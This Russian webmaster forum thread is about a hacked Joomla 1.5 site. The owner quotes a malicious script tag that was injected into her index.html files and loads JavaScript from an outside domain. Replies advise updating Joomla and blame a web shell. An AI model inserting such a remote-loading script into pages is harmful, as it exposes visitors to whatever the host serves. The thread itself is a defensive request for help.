- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте, уважаемые))
Недавно Яндекс поставил мой сайт в разряд подозрительных, обнаружив в нем редирект..при этом никто кроме Яндекса ничего не видел и не обнаруживал..я все проверяла, на многих онлайн ресурсах, айболитом и другими антивирусниками в том числе. потом как-то раз случайно зашла в файл index.html и ужаснулась-там были ссылки скриптом написанные.. причем они были повсюду во всех index.html, во всех почти папках. Я вручную все поудаляла, практически полный ноль в кодах и теперь не знаю где может скрываться взломщик, и ведь все повторится сначала, увы, это я понимаю..
скрипт, который выводился вот: <script id="top100Counter" type="text/javascript" src="hhttp://idiri.ru/tmp/js.js"></script>"
может у кого-то были подобные случаи? поделитесь, прошу! хотелось бы решить проблему глобально.
версия joomla?
покажите пациента.
версия старая 1,5-23...
показывать стесняюсь, он не очень красивый, может подскажите - как во все индекс файлы проставляются ссылки? мне кажется, что тут червь какой-то от сервера скорее заполз, потому что все поражены и другие мои сайты одинаково, но их яша не определяет как вредные почему-то..
kavins, эту версию лучше до 2,5 обновить, на всех сайтах
да я сайты в основном там для себя сделала, не очень понимаю как с шаблонами быть для 2,5 версии,увы( давно бы обновилась, один сайт на 2,5 у меня-там такого пока что нет
kavins,
Ну сразу можно обновить и до 1.5.26
ваш червь называется шелл-скрипт
да и 1.5.26 последняя в ветке, обновление желательно
да обновлюсь обязательно, как-то особо не заморачивалась, года два практически назад их делала, обновилась до 23 версии и забыла)) пока вот не взломали..все было спокойно и нормально🍿
да обновлюсь обязательно, как-то особо не заморачивалась, года два практически назад их делала, обновилась до 23 версии и забыла)) пока вот не взломали..все было спокойно и нормально🍿
Версии движков обновляют не для того, чтоб лишний раз порадовать пользователей, а преимущественно для того, чтоб залатать дыры, чтоб уменьшить вероятность взлома.
Потому не ленитесь предохраняться заранее и следите за актуальными обновлениями Joomla :)
Сам использую для сайтов версию 2.5 с последним ее апдейтом и пока еще ни разу не ломали.
Пользуйтесь лиц. DLE, практически непробиваема перед шеллами. А версия джомлы роли не играет, все равно много уязвимостей
Пользуйтесь лиц. DLE, практически непробиваема перед шеллами. А версия джомлы роли не играет, все равно много уязвимостей
Да неужели так непробиваема?
Видно, что 50% из топ-10000 заражённых сайтов используют систему DLE, а популярные сайты из топ-10000 либо отказались от неё, либо успешно её маскируют, чтобы избежать атаки.
источник http://safesearch.ya.ru/replies.xml?item_no=120
Давай ещё что-нибудь смешное напиши раз уж начал.